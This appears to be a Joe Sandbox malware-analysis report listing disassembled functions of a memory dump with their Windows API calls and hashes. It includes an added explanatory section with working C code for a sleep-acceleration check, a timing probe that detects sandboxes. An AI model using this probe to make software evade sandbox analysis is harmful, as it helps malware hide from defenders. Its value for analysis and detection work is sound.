                                                                                                                              • Instruction ID: 343fe139fc1e39dfd79bcb0ac2793db0f6f023a45f3ef36d23b90959bdf51bfc
                                                                                                                              • Opcode Fuzzy Hash: 5806d79a773fe39f8f27935e5dac7883888fa4cdcffe72d803bbb84c3b9c4b9e
                                                                                                                              • Instruction Fuzzy Hash: AA410135900106AFDB24DB68DC49FA9BB6AAB09360F154A67E919A73E0C730ED41DA90
                                                                                                                              APIs
                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001C17D4
                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001C17FD
                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001C183C
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001C1861
                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001C1869
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1389676194-0
                                                                                                                              • Opcode ID: 44473e994c7890d149d75300994a39ecfa6b94e2b422274f3139fb0061c93854
                                                                                                                              • Instruction ID: 397b03aec5a7b82c27722311d6f17745e3ab224ca082a8df3aee2cb5b4d0c4d1
                                                                                                                              • Opcode Fuzzy Hash: 44473e994c7890d149d75300994a39ecfa6b94e2b422274f3139fb0061c93854
                                                                                                                              • Instruction Fuzzy Hash: 1E411C35A00205EFCB11EF64C985EADBBF5EF58310B14C099E80AAB362DB71ED51DB91
                                                                                                                              APIs
                                                                                                                              • GetCursorPos.USER32(000000FF), ref: 0018B749
                                                                                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 0018B766
                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 0018B78B
                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 0018B799
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4210589936-0
                                                                                                                              • Opcode ID: de415fb25b0e0f4fcbadfab616424849ac9b418bbf9c8ad7664adaeb42615228
                                                                                                                              • Instruction ID: 6482624a086cf3c66b672cefb46d1df44aa9fd95bf2d0b4507f28a29658a987e
                                                                                                                              • Opcode Fuzzy Hash: de415fb25b0e0f4fcbadfab616424849ac9b418bbf9c8ad7664adaeb42615228
                                                                                                                              • Instruction Fuzzy Hash: FD415F35508659FFDF199F65C884AEDBBB5BB45364F10431AF829922E0C730AA90DFA0
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001AC156
                                                                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 001AC200
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 001AC208
                                                                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 001AC216
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001AC21E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3382505437-0
                                                                                                                              • Opcode ID: 3486d25abbc39fa87d8a04574a05c256db92cf6c0c317378ae21d4f83a8c1b8c
                                                                                                                              • Instruction ID: c89e005454b9aaf4f9fee22d6a6f28e191be511fa8df22f3ad3dcba28e92d891
                                                                                                                              • Opcode Fuzzy Hash: 3486d25abbc39fa87d8a04574a05c256db92cf6c0c317378ae21d4f83a8c1b8c
                                                                                                                              • Instruction Fuzzy Hash: 6B31E175600219EBDF04CFA8DD4CAAE3BB6EB05325F114229F820EB2D1C7B09954CB90
                                                                                                                              APIs
                                                                                                                              • IsWindowVisible.USER32(?), ref: 001AE9CD
                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001AE9EA
                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001AEA22
                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001AEA48
                                                                                                                              • _wcsstr.LIBCMT ref: 001AEA52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3902887630-0
                                                                                                                              • Opcode ID: 24867ded04ad41c964d290f2a3fc59f6f12e05cc646bc4630fa966245fc31ade
                                                                                                                              • Instruction ID: 3f0556bfe364142c286b387a047340944052d46dfd73afe9b89330d39bda5b56
                                                                                                                              • Opcode Fuzzy Hash: 24867ded04ad41c964d290f2a3fc59f6f12e05cc646bc4630fa966245fc31ade
                                                                                                                              • Instruction Fuzzy Hash: C021F976204200BEEB159B69EC45E7F7BEDDF4A760F108039F809CB191DB71DC409650
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001DDCC0
                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 001DDCE4
                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001DDCFC
                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 001DDD24
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,001C407D,00000000), ref: 001DDD42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2294984445-0
                                                                                                                              • Opcode ID: 093a5bf43b0cf3682928e574d8aa5b1b4d93a0caa435b75099d1133164fa3b76
                                                                                                                              • Instruction ID: 6e502cca988b617010bcb0eaed2c93fcab2e2b09707d164dd1973d8b5574a1d5
                                                                                                                              • Opcode Fuzzy Hash: 093a5bf43b0cf3682928e574d8aa5b1b4d93a0caa435b75099d1133164fa3b76
                                                                                                                              • Instruction Fuzzy Hash: 9D21CF71614622AFCF205FB9AC48B7A37A6FB45365F11072AF926C66E0D7709860CB90
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001ACA86
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001ACAB8
                                                                                                                              • __itow.LIBCMT ref: 001ACAD0
                                                                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001ACAF6
                                                                                                                              • __itow.LIBCMT ref: 001ACB07
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$__itow$_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2983881199-0
                                                                                                                              • Opcode ID: 83b319a172e94426ebd02999951564eb10129479978d4e6df18e49b8b164dd69
                                                                                                                              • Instruction ID: 6ac3e37b8e821baa1c6b69baef4a7beb07dcd27d7785a9ed93d5dfa19de895d4
                                                                                                                              • Opcode Fuzzy Hash: 83b319a172e94426ebd02999951564eb10129479978d4e6df18e49b8b164dd69
                                                                                                                              • Instruction Fuzzy Hash: 1221D87A7002147BDB21EAA49C47FEE7AA9AF5E750F104024FD05E7281E7718D4587F0
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(00000000), ref: 001C89CE
                                                                                                                              • GetForegroundWindow.USER32 ref: 001C89E5
                                                                                                                              • GetDC.USER32(00000000), ref: 001C8A21
                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 001C8A2D
                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 001C8A68
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4156661090-0
                                                                                                                              • Opcode ID: 4224bdb9dcc7dd0c7a68f90ccb4de7b2f26f5945f6cb0817bf3bd0dfdd21c253
                                                                                                                              • Instruction ID: ba8a1fe2273b505f110a4f09df01bd15e3024524afd5bc0031baaf29630f5c62
                                                                                                                              • Opcode Fuzzy Hash: 4224bdb9dcc7dd0c7a68f90ccb4de7b2f26f5945f6cb0817bf3bd0dfdd21c253
                                                                                                                              • Instruction Fuzzy Hash: 32216F75A00200AFDB10EFA5D889AAA7BF5EF58315B048479E94AD7751CB70ED40CB90
                                                                                                                              APIs
                                                                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0018B5EB
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0018B5FA
                                                                                                                              • BeginPath.GDI32(?), ref: 0018B611
                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0018B63B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3225163088-0
                                                                                                                              • Opcode ID: 0b99312dd344aef058c780a4781f83e97c1ff4be8192fbd2768271b03d6e5f71
                                                                                                                              • Instruction ID: 82a11f450262e7238332612b14123c4c288aa26a8032cf3a10a2a293e93c1d57
                                                                                                                              • Opcode Fuzzy Hash: 0b99312dd344aef058c780a4781f83e97c1ff4be8192fbd2768271b03d6e5f71
                                                                                                                              • Instruction Fuzzy Hash: 03219D70904345EFEB10AF15FC8C7AABBE9FB10325F24412AF815921A0D3749AA1CF58
                                                                                                                              APIs
                                                                                                                              • __calloc_crt.LIBCMT ref: 00192E81
                                                                                                                              • CreateThread.KERNEL32(?,?,00192FB7,00000000,?,?), ref: 00192EC5
                                                                                                                              • GetLastError.KERNEL32 ref: 00192ECF
                                                                                                                              • _free.LIBCMT ref: 00192ED8
                                                                                                                              • __dosmaperr.LIBCMT ref: 00192EE3
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2664167353-0
                                                                                                                              • Opcode ID: 35bfed4d17f4a8007c5367a2f031490604acba61985aa46050e4c838c02957a3
                                                                                                                              • Instruction ID: 64246852d3080dd0c13921c8e90d616207c76aafc6eb176b97ddec80a4e277b3
                                                                                                                              • Opcode Fuzzy Hash: 35bfed4d17f4a8007c5367a2f031490604acba61985aa46050e4c838c02957a3
                                                                                                                              • Instruction Fuzzy Hash: 0411C432104706BFDF20BFA5AC81DAB7BA9EF55770B100429FA1886191EB31D80087A0
                                                                                                                              APIs
                                                                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 001AB903
                                                                                                                              • GetLastError.KERNEL32(?,001AB3CB,?,?,?), ref: 001AB90D
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,001AB3CB,?,?,?), ref: 001AB91C
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,001AB3CB), ref: 001AB923
                                                                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 001AB93A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 883493501-0
                                                                                                                              • Opcode ID: 1f58a2617ededcd25ec648effc3a0b00e376f9ace5956d648630becb6a67f13d
                                                                                                                              • Instruction ID: e40612c148238d41a0570400f86bfa897a8a5bae13f0605ddfa3df25b1513d96
                                                                                                                              • Opcode Fuzzy Hash: 1f58a2617ededcd25ec648effc3a0b00e376f9ace5956d648630becb6a67f13d
                                                                                                                              • Instruction Fuzzy Hash: D6011DB5205244BFDB115FA5EC88DBB3BAEEF8A768B100429F545C2151DB759C80DA60
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B8371
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001B837F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001B8387
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001B8391
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 001B83CD
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 26bfdeb1d42cfd0983cef7bbe0b47049be88b00400e3462952df92e8dd107183
• Instruction ID: 990f6648d16dcba6148f5196a1aa526a6b50734ff051e28c1efa47692945a0b4
• Opcode Fuzzy Hash: 26bfdeb1d42cfd0983cef7bbe0b47049be88b00400e3462952df92e8dd107183
• Instruction Fuzzy Hash: 7B012935D04619EBCF00AFA5ED48AFEBBB9FB08B01F010055E541B2160DF709594CBA2
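The QueryPerformanceCounter / QueryPerformanceFrequency / Sleep / QueryPerformanceCounter chain in the function above is the sequence an analyst looks for when checking for sleep-acceleration detection: a sandbox that fast-forwards Sleep() to shorten analysis returns before the high-resolution counter has advanced by the requested amount, while real hardware does not. The record alone does not establish whether this function uses the chain for evasion or merely for precise timing. The following is an added example written for this page (not code from the report or from the sample) that implements the check with the decision logic separated from the measurement, so it runs on a Windows host with the native APIs and elsewhere with a POSIX fallback. The 0.9 tolerance and the 200 ms probe delay are assumptions chosen for illustration.

```c
/*
 * Sleep-acceleration probe (added example, not from the report or sample).
 * Decision logic is pure so it can be tested without a Windows host;
 * measure_sleep() uses QueryPerformanceCounter/Sleep on Windows and
 * clock_gettime/nanosleep elsewhere.
 */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdint.h>
#include <stdio.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <time.h>
#endif

/* Wall-clock milliseconds between two counter reads at the given frequency.
 * A zero frequency or a counter that ran backwards yields 0.0, which the
 * caller treats as "could not verify the delay" and therefore suspicious. */
double elapsed_ms(uint64_t freq, uint64_t start, uint64_t end)
{
    if (freq == 0 || end < start)
        return 0.0;
    return (double)(end - start) * 1000.0 / (double)freq;
}

/* Core check: returns 1 if the observed delay is implausibly short.
 * tolerance is the fraction of the requested delay that must have elapsed
 * (assumed 0.9 here: a 500 ms Sleep returning in under 450 ms is flagged). */
int sleep_was_accelerated(uint32_t requested_ms, uint64_t freq,
                          uint64_t start, uint64_t end, double tolerance)
{
    double observed = elapsed_ms(freq, start, end);
    return observed < (double)requested_ms * tolerance;
}

/* Platform wrapper mirroring the API chain: read counter, sleep, read again. */
static void measure_sleep(uint32_t ms, uint64_t *freq,
                          uint64_t *start, uint64_t *end)
{
#ifdef _WIN32
    LARGE_INTEGER f, s, e;
    QueryPerformanceFrequency(&f);
    QueryPerformanceCounter(&s);
    Sleep(ms);
    QueryPerformanceCounter(&e);
    *freq  = (uint64_t)f.QuadPart;
    *start = (uint64_t)s.QuadPart;
    *end   = (uint64_t)e.QuadPart;
#else
    struct timespec s, e;
    struct timespec req = { .tv_sec = ms / 1000,
                            .tv_nsec = (long)(ms % 1000) * 1000000L };
    clock_gettime(CLOCK_MONOTONIC, &s);
    nanosleep(&req, NULL);
    clock_gettime(CLOCK_MONOTONIC, &e);
    *freq  = 1000000000ULL; /* CLOCK_MONOTONIC is expressed in nanoseconds */
    *start = (uint64_t)s.tv_sec * 1000000000ULL + (uint64_t)s.tv_nsec;
    *end   = (uint64_t)e.tv_sec * 1000000000ULL + (uint64_t)e.tv_nsec;
#endif
}

/* Run the probe once for the given delay; 1 means acceleration detected. */
int probe_sleep_skew(uint32_t ms)
{
    uint64_t freq, start, end;
    measure_sleep(ms, &freq, &start, &end);
    return sleep_was_accelerated(ms, freq, start, end, 0.9);
}

int main(void)
{
    printf("sleep accelerated: %s\n", probe_sleep_skew(200) ? "yes" : "no");
    return 0;
}
```

On a genuine host nanosleep() and Sleep() never return early except on a signal, so the probe reports "no"; a sandbox that patches Sleep() to return immediately without also scaling the performance counter reports "yes". Note that a sandbox which hooks both the sleep and the timer consistently defeats this check, which is why analysts also compare against independent clocks (for example GetTickCount or the RDTSC instruction).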
APIs
• CLSIDFromProgID.COMBASE ref: 001AA874
• ProgIDFromCLSID.COMBASE(?,00000000), ref: 001AA88F
• lstrcmpiW.KERNEL32(?,00000000), ref: 001AA89D
• CoTaskMemFree.COMBASE(00000000), ref: 001AA8AD
• CLSIDFromString.COMBASE(?,?), ref: 001AA8B9
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 003df2f7051e43831e3dbce08e71a5061f70f740579c3ff07f575f2ee3405ddb
• Instruction ID: 8a0d238f75a65c77243da7ee6092b86d42942dbc27c52149bcc931ad3b134c38
• Opcode Fuzzy Hash: 003df2f7051e43831e3dbce08e71a5061f70f740579c3ff07f575f2ee3405ddb
• Instruction Fuzzy Hash: 66018B7A600204AFDB104F68EC88BBABBAEEF45392F104028F905D2210D778DD81DBA1
APIs
